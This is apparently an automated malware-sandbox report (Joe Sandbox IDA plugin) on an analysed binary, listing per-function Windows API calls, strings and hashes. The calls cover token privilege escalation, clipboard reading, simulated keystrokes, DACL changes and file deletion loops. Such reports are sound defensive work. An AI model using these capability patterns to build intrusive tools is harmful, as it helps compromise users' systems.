                                    • Instruction Fuzzy Hash: 5432F075604384EFDB12CFA4C894B6ABBA8FF89344F144A2AF695C72A1D731DC42CB51
                                    APIs
                                    • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 009EB1CD
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: MessageSend
                                    • String ID: %d/%02d/%02d
                                    • API String ID: 3850602802-328681919
                                    • Opcode ID: 841682fd54f5394560c15c04f4ab70301a5e32a5c05d1cadbca6e468658b7552
                                    • Instruction ID: d7cf4339e71c658a5ce6c9d2c2199e0bfde5bff523aa2342464dca1452f9ec24
                                    • Opcode Fuzzy Hash: 841682fd54f5394560c15c04f4ab70301a5e32a5c05d1cadbca6e468658b7552
                                    • Instruction Fuzzy Hash: D412C071500248ABEB269FA6CC49FAF7BB8FF85320F104519F915DA2E1DB749D42CB11
                                    APIs
                                    • GetForegroundWindow.USER32(00000000,00000000), ref: 0099EB4A
                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 009F3AEA
                                    • IsIconic.USER32(000000FF), ref: 009F3AF3
                                    • ShowWindow.USER32(000000FF,00000009), ref: 009F3B00
                                    • SetForegroundWindow.USER32(000000FF), ref: 009F3B0A
                                    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 009F3B20
                                    • GetCurrentThreadId.KERNEL32 ref: 009F3B27
                                    • GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 009F3B33
                                    • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 009F3B44
                                    • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 009F3B4C
                                    • AttachThreadInput.USER32(00000000,?,00000001), ref: 009F3B54
                                    • SetForegroundWindow.USER32(000000FF), ref: 009F3B57
                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 009F3B6C
                                    • keybd_event.USER32(00000012,00000000), ref: 009F3B77
                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 009F3B81
                                    • keybd_event.USER32(00000012,00000000), ref: 009F3B86
                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 009F3B8F
                                    • keybd_event.USER32(00000012,00000000), ref: 009F3B94
                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 009F3B9E
                                    • keybd_event.USER32(00000012,00000000), ref: 009F3BA3
                                    • SetForegroundWindow.USER32(000000FF), ref: 009F3BA6
                                    • AttachThreadInput.USER32(000000FF,?,00000000), ref: 009F3BCD
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                    • String ID: Shell_TrayWnd
                                    • API String ID: 4125248594-2988720461
                                    • Opcode ID: 66703ff2023ffad121d25210d689ecb4e9fdcaf7e55d035ff9a9de774c507bd4
                                    • Instruction ID: 7b3be6d1954baf5b3827b6788919fbffa80ab2cd1c9465b10b97ba4d2c7911c4
                                    • Opcode Fuzzy Hash: 66703ff2023ffad121d25210d689ecb4e9fdcaf7e55d035ff9a9de774c507bd4
                                    • Instruction Fuzzy Hash: 69314572A4021CBFEB215BE59C49F7F7E6CEB44B50F104015FB05EA1D1D6B59D029BA0
                                    APIs
                                      • Part of subcall function 009BB134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 009BB180
                                      • Part of subcall function 009BB134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 009BB1AD
                                      • Part of subcall function 009BB134: GetLastError.KERNEL32 ref: 009BB1BA
                                    • _memset.LIBCMT ref: 009BAD08
                                    • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 009BAD5A
                                    • CloseHandle.KERNEL32(?), ref: 009BAD6B
                                    • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 009BAD82
                                    • GetProcessWindowStation.USER32 ref: 009BAD9B
                                    • SetProcessWindowStation.USER32(00000000), ref: 009BADA5
                                    • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 009BADBF
                                      • Part of subcall function 009BAB84: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,009BACC0), ref: 009BAB99
                                      • Part of subcall function 009BAB84: CloseHandle.KERNEL32(?,?,009BACC0), ref: 009BABAB
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                    • String ID: $default$winsta0
                                    • API String ID: 2063423040-1027155976
                                    • Opcode ID: a2849ff5b617f50a1a2817cd953b5cda76846243b8f2f78cbd241aedf22f230c
                                    • Instruction ID: d6e06b7488773633147f30beea5a89bfd631881f76136157fc4d927f4f44d864
                                    • Opcode Fuzzy Hash: a2849ff5b617f50a1a2817cd953b5cda76846243b8f2f78cbd241aedf22f230c
                                    • Instruction Fuzzy Hash: C3816B72800209AFEF11DFE4DE49AEEBBBCEF04324F044119F914A61A1D7728E56DB61
                                    APIs
                                      • Part of subcall function 009C6EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,009C5FA6,?), ref: 009C6ED8
                                      • Part of subcall function 009C6EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,009C5FA6,?), ref: 009C6EF1
                                      • Part of subcall function 009C725E: __wsplitpath.LIBCMT ref: 009C727B
                                      • Part of subcall function 009C725E: __wsplitpath.LIBCMT ref: 009C728E
                                      • Part of subcall function 009C72CB: GetFileAttributesW.KERNEL32(?,009C6019), ref: 009C72CC
                                    • _wcscat.LIBCMT ref: 009C6149
                                    • _wcscat.LIBCMT ref: 009C6167
                                    • __wsplitpath.LIBCMT ref: 009C618E
                                    • FindFirstFileW.KERNEL32(?,?), ref: 009C61A4
                                    • _wcscpy.LIBCMT ref: 009C6209
                                    • _wcscat.LIBCMT ref: 009C621C
                                    • _wcscat.LIBCMT ref: 009C622F
                                    • lstrcmpiW.KERNEL32(?,?), ref: 009C625D
                                    • DeleteFileW.KERNEL32(?), ref: 009C626E
                                    • MoveFileW.KERNEL32(?,?), ref: 009C6289
                                    • MoveFileW.KERNEL32(?,?), ref: 009C6298
                                    • CopyFileW.KERNEL32(?,?,00000000), ref: 009C62AD
                                    • DeleteFileW.KERNEL32(?), ref: 009C62BE
                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 009C62E1
                                    • FindClose.KERNEL32(00000000), ref: 009C62FD
                                    • FindClose.KERNEL32(00000000), ref: 009C630B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: File$Find_wcscat$__wsplitpath$CloseDeleteFullMoveNamePath$AttributesCopyFirstNext_wcscpylstrcmpi
                                    • String ID: \*.*
                                    • API String ID: 1917200108-1173974218
                                    • Opcode ID: c96f2b732773e21ad69588e4d6db18c7ac641f575ed25e17df808a7ab8b45e46
                                    • Instruction ID: 7d986afe1317f986c8643e9ac30f6d15dfa37a319432f3f76cef9b19f2b9fc84
                                    • Opcode Fuzzy Hash: c96f2b732773e21ad69588e4d6db18c7ac641f575ed25e17df808a7ab8b45e46
                                    • Instruction Fuzzy Hash: 9C511F72C0811C6ACB21EB95CC44EEFB7BCAF45300F0905EAE595E2141EE36974ACFA5
                                    APIs
                                    • OpenClipboard.USER32(00A1DC00), ref: 009D6B36
                                    • IsClipboardFormatAvailable.USER32(0000000D), ref: 009D6B44
                                    • GetClipboardData.USER32(0000000D), ref: 009D6B4C
                                    • CloseClipboard.USER32 ref: 009D6B58
                                    • GlobalLock.KERNEL32(00000000), ref: 009D6B74
                                    • CloseClipboard.USER32 ref: 009D6B7E
                                    • GlobalUnlock.KERNEL32(00000000), ref: 009D6B93
                                    • IsClipboardFormatAvailable.USER32(00000001), ref: 009D6BA0
                                    • GetClipboardData.USER32(00000001), ref: 009D6BA8
                                    • GlobalLock.KERNEL32(00000000), ref: 009D6BB5
                                    • GlobalUnlock.KERNEL32(00000000), ref: 009D6BE9
                                    • CloseClipboard.USER32 ref: 009D6CF6
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                    • String ID:
                                    • API String ID: 3222323430-0
                                    • Opcode ID: 15402e3f31fd536b94edeea822d25c07dd4e4db16edf052773184b7e2a6661d2
                                    • Instruction ID: 9bafe0fbb01de3ae504db69cdc33f613ec77182b10f9e533f841aeff1d2f2d7b
                                    • Opcode Fuzzy Hash: 15402e3f31fd536b94edeea822d25c07dd4e4db16edf052773184b7e2a6661d2
                                    • Instruction Fuzzy Hash: 5B519072244205ABD300FFA4DD96F6E77A8AF88B10F00442AF686D62D1DF75D9068B62
                                    APIs
                                    • FindFirstFileW.KERNEL32(?,?), ref: 009CF62B
                                    • FindClose.KERNEL32(00000000), ref: 009CF67F
                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 009CF6A4
                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 009CF6BB
                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 009CF6E2
                                    • __swprintf.LIBCMT ref: 009CF72E
                                    • __swprintf.LIBCMT ref: 009CF767
                                    • __swprintf.LIBCMT ref: 009CF7BB
                                      • Part of subcall function 009A172B: __woutput_l.LIBCMT ref: 009A1784
                                    • __swprintf.LIBCMT ref: 009CF809
                                    • __swprintf.LIBCMT ref: 009CF858
                                    • __swprintf.LIBCMT ref: 009CF8A7
                                    • __swprintf.LIBCMT ref: 009CF8F6
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: __swprintf$FileTime$FindLocal$CloseFirstSystem__woutput_l
                                    • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                    • API String ID: 835046349-2428617273
                                    • Opcode ID: 7169e5460165ca8b838dd1c0318d92b37f8b37e6cd93a742876cd5a76961a13e
                                    • Instruction ID: 3030244f3bcf8eec397ceb097d2e680005fdf8fb9c3a282b9b6f07b97c2e76a3
                                    • Opcode Fuzzy Hash: 7169e5460165ca8b838dd1c0318d92b37f8b37e6cd93a742876cd5a76961a13e
                                    • Instruction Fuzzy Hash: E8A100B2408344ABC710EFA4C995EAFB7ECAF98704F440D2EF595C2152EB34D949C762
                                    APIs
                                    • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 009D1B50
                                    • _wcscmp.LIBCMT ref: 009D1B65
                                    • _wcscmp.LIBCMT ref: 009D1B7C
                                    • GetFileAttributesW.KERNEL32(?), ref: 009D1B8E
                                    • SetFileAttributesW.KERNEL32(?,?), ref: 009D1BA8
                                    • FindNextFileW.KERNEL32(00000000,?), ref: 009D1BC0
                                    • FindClose.KERNEL32(00000000), ref: 009D1BCB
                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 009D1BE7
                                    • _wcscmp.LIBCMT ref: 009D1C0E
                                    • _wcscmp.LIBCMT ref: 009D1C25
                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 009D1C37
                                    • SetCurrentDirectoryW.KERNEL32(00A339FC), ref: 009D1C55
                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 009D1C5F
                                    • FindClose.KERNEL32(00000000), ref: 009D1C6C
                                    • FindClose.KERNEL32(00000000), ref: 009D1C7C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                    • String ID: *.*
                                    • API String ID: 1803514871-438819550
                                    • Opcode ID: 14d757e0e3ba0503e57c02d8329e65e0f69d14f36a409ce4b863dcb67672d115
                                    • Instruction ID: bda6d1c2248e13cb5046cf46814428c8a24eb548b3b6eed2e1860256d907e9b7
                                    • Opcode Fuzzy Hash: 14d757e0e3ba0503e57c02d8329e65e0f69d14f36a409ce4b863dcb67672d115
                                    • Instruction Fuzzy Hash: 49318033A84219BBDF10EBF0DC49BDE77ACAF45324F148557F811E2190EB74DA868A64
                                    APIs
                                      • Part of subcall function 0099B34E: GetWindowLongW.USER32(?,000000EB), ref: 0099B35F
                                    • DragQueryPoint.SHELL32(?,?), ref: 009EF37A
                                      • Part of subcall function 009ED7DE: ClientToScreen.USER32(?,?), ref: 009ED807
                                      • Part of subcall function 009ED7DE: GetWindowRect.USER32(?,?), ref: 009ED87D
                                      • Part of subcall function 009ED7DE: PtInRect.USER32(?,?,009EED5A), ref: 009ED88D
                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 009EF3E3
                                    • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 009EF3EE
                                    • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 009EF411
                                    • _wcscat.LIBCMT ref: 009EF441
                                    • SendMessageW.USER32(?,000000C2,00000001,?), ref: 009EF458
                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 009EF471
                                    • SendMessageW.USER32(?,000000B1,?,?), ref: 009EF488
                                    • SendMessageW.USER32(?,000000B1,?,?), ref: 009EF4AA
                                    • DragFinish.SHELL32(?), ref: 009EF4B1
                                    • NtdllDialogWndProc_W.USER32(?,00000233,?,00000000,?,?,?), ref: 009EF59C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: MessageSend$Drag$Query$FileRectWindow$ClientDialogFinishLongNtdllPointProc_Screen_wcscat
                                    • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                    • API String ID: 2166380349-3440237614
                                    • Opcode ID: 4532f6e567994b474abfc2b9a486730e2c3c98c9a7578a9cf63ce4e7c542caef
                                    • Instruction ID: d17761d23241e0135fed87600a8023349eabfecc764f219292ec638999ae86fd
                                    • Opcode Fuzzy Hash: 4532f6e567994b474abfc2b9a486730e2c3c98c9a7578a9cf63ce4e7c542caef
                                    • Instruction Fuzzy Hash: D5613A72108344AFC701EFA4CC85E9BBBE8BFC9710F000A1EB595921A1DB71DA4ACB52
                                    APIs
                                    • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 009D1CAB
                                    • _wcscmp.LIBCMT ref: 009D1CC0
                                    • _wcscmp.LIBCMT ref: 009D1CD7
                                      • Part of subcall function 009C6BD4: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 009C6BEF
                                    • FindNextFileW.KERNEL32(00000000,?), ref: 009D1D06
                                    • FindClose.KERNEL32(00000000), ref: 009D1D11
                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 009D1D2D
                                    • _wcscmp.LIBCMT ref: 009D1D54
                                    • _wcscmp.LIBCMT ref: 009D1D6B
                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 009D1D7D
                                    • SetCurrentDirectoryW.KERNEL32(00A339FC), ref: 009D1D9B
                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 009D1DA5
                                    • FindClose.KERNEL32(00000000), ref: 009D1DB2
                                    • FindClose.KERNEL32(00000000), ref: 009D1DC2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                    • String ID: *.*
                                    • API String ID: 1824444939-438819550
                                    • Opcode ID: 00fd5f8c62dcefffd0eb417405621f45c2b51558037283f16bab8a7ac4d39a5c
                                    • Instruction ID: 417264114bd67a972619bdbaca68f8a38bf22b8a2192b2e52aa92de2bba22194
                                    • Opcode Fuzzy Hash: 00fd5f8c62dcefffd0eb417405621f45c2b51558037283f16bab8a7ac4d39a5c
                                    • Instruction Fuzzy Hash: 6C31D43394461EBADF10EFE0DC09BDE77ADAF45324F148556F801A22D1DB70DA868A64
                                    APIs
                                    • GetLocalTime.KERNEL32(?), ref: 009D09DF
                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 009D09EF
                                    • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 009D09FB
                                    • __wsplitpath.LIBCMT ref: 009D0A59
                                    • _wcscat.LIBCMT ref: 009D0A71
                                    • _wcscat.LIBCMT ref: 009D0A83
                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 009D0A98
                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 009D0AAC
                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 009D0ADE
                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 009D0AFF
                                    • _wcscpy.LIBCMT ref: 009D0B0B
                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 009D0B4A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                    • String ID: *.*
                                    • API String ID: 3566783562-438819550
                                    • Opcode ID: bf64a5d591f53e350d9be88d05cd2762496770e6fa55e29fd7ad185dbb0991a4
                                    • Instruction ID: 9f6f1332383dcad8fe6be7be9bf1c44d6853bda77e6cce547dc3498ff1df62dd
                                    • Opcode Fuzzy Hash: bf64a5d591f53e350d9be88d05cd2762496770e6fa55e29fd7ad185dbb0991a4
                                    • Instruction Fuzzy Hash: 4A6136725082059FDB10EF60C845AAEB3E8FFC9314F04891EF99997351EB35EA45CB92
                                    APIs
                                      • Part of subcall function 0099B34E: GetWindowLongW.USER32(?,000000EB), ref: 0099B35F
                                    • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 009EEF3B
                                    • GetFocus.USER32 ref: 009EEF4B
                                    • GetDlgCtrlID.USER32(00000000), ref: 009EEF56
                                    • _memset.LIBCMT ref: 009EF081
                                    • GetMenuItemInfoW.USER32 ref: 009EF0AC
                                    • GetMenuItemCount.USER32(00000000), ref: 009EF0CC
                                    • GetMenuItemID.USER32(?,00000000), ref: 009EF0DF
                                    • GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 009EF113
                                    • GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 009EF15B
                                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 009EF193
                                    • NtdllDialogWndProc_W.USER32(?,00000111,?,?,?,?,?,?,?), ref: 009EF1C8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: ItemMenu$Info$CheckCountCtrlDialogFocusLongMessageNtdllPostProc_RadioWindow_memset
                                    • String ID: 0
                                    • API String ID: 3616455698-4108050209
                                    • Opcode ID: 571449ab374eff30ae35eb19b4b37b612b05faa31a917df6609c0de38b387cf6
                                    • Instruction ID: 369ed231cf425bd431491737d84534d23c80ce5b8ef20d0308eea3c5d6fb61f6
                                    • Opcode Fuzzy Hash: 571449ab374eff30ae35eb19b4b37b612b05faa31a917df6609c0de38b387cf6
                                    • Instruction Fuzzy Hash: 27819F71608345EFDB11CF56C894A6BBBE9FB88314F00492EF99897291D731DD06CB92
                                    APIs
                                      • Part of subcall function 009BABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 009BABD7
                                      • Part of subcall function 009BABBB: GetLastError.KERNEL32(?,009BA69F,?,?,?), ref: 009BABE1
                                      • Part of subcall function 009BABBB: GetProcessHeap.KERNEL32(00000008,?,?,009BA69F,?,?,?), ref: 009BABF0
                                      • Part of subcall function 009BABBB: RtlAllocateHeap.KERNEL32(00000000,?,009BA69F,?,?,?), ref: 009BABF7
                                      • Part of subcall function 009BABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 009BAC0E
                                      • Part of subcall function 009BAC56: GetProcessHeap.KERNEL32(00000008,009BA6B5,00000000,00000000,?,009BA6B5,?), ref: 009BAC62
                                      • Part of subcall function 009BAC56: RtlAllocateHeap.KERNEL32(00000000,?,009BA6B5,?), ref: 009BAC69
                                      • Part of subcall function 009BAC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,009BA6B5,?), ref: 009BAC7A
                                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 009BA6D0
                                    • _memset.LIBCMT ref: 009BA6E5
                                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 009BA704
                                    • GetLengthSid.ADVAPI32(?), ref: 009BA715
                                    • GetAce.ADVAPI32(?,00000000,?), ref: 009BA752
                                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 009BA76E
                                    • GetLengthSid.ADVAPI32(?), ref: 009BA78B
                                    • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 009BA79A
                                    • RtlAllocateHeap.KERNEL32(00000000), ref: 009BA7A1
                                    • GetLengthSid.ADVAPI32(?,00000008,?), ref: 009BA7C2
                                    • CopySid.ADVAPI32(00000000), ref: 009BA7C9
                                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 009BA7FA
                                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 009BA820
                                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 009BA834
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: HeapSecurity$AllocateDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                    • String ID:
                                    • API String ID: 2347767575-0
                                    • Opcode ID: e8048f1d0fc0aac7caf6c465164dae86dbe6b17d93da25f190e85cf96f04c43b
                                    • Instruction ID: 1904bd344abf948cd9e6d2c0f288186cd1a90dd57b65ffd0df9b574e9b12d0cb
                                    • Opcode Fuzzy Hash: e8048f1d0fc0aac7caf6c465164dae86dbe6b17d93da25f190e85cf96f04c43b
                                    • Instruction Fuzzy Hash: 2F514A71900209ABDF14DFE5DD85AEEBBB9FF44310F048129F915A72A0DB359A06CB61
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
                                    • API String ID: 0-4052911093
                                    • Opcode ID: f9ba260c52c1938be0250730c04c9d60e20a21f4638e6e219bb6b388fc98d3e8
                                    • Instruction ID: 271aedc37b367ab4d2a7f9193d9e5c8566e0f5090ce6e284fa19bee1e72e52e7
                                    • Opcode Fuzzy Hash: f9ba260c52c1938be0250730c04c9d60e20a21f4638e6e219bb6b388fc98d3e8
                                    • Instruction Fuzzy Hash: 5D727F71E04219DBDF24DF98D8807AEB7B5BF48310F24816AE915EB390DB749E81DB90
                                    APIs
                                      • Part of subcall function 009C6EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,009C5FA6,?), ref: 009C6ED8
                                      • Part of subcall function 009C72CB: GetFileAttributesW.KERNEL32(?,009C6019), ref: 009C72CC
                                    • _wcscat.LIBCMT ref: 009C6441
                                    • __wsplitpath.LIBCMT ref: 009C645F
                                    • FindFirstFileW.KERNEL32(?,?), ref: 009C6474
                                    • _wcscpy.LIBCMT ref: 009C64A3
                                    • _wcscat.LIBCMT ref: 009C64B8
                                    • _wcscat.LIBCMT ref: 009C64CA
                                    • DeleteFileW.KERNEL32(?), ref: 009C64DA
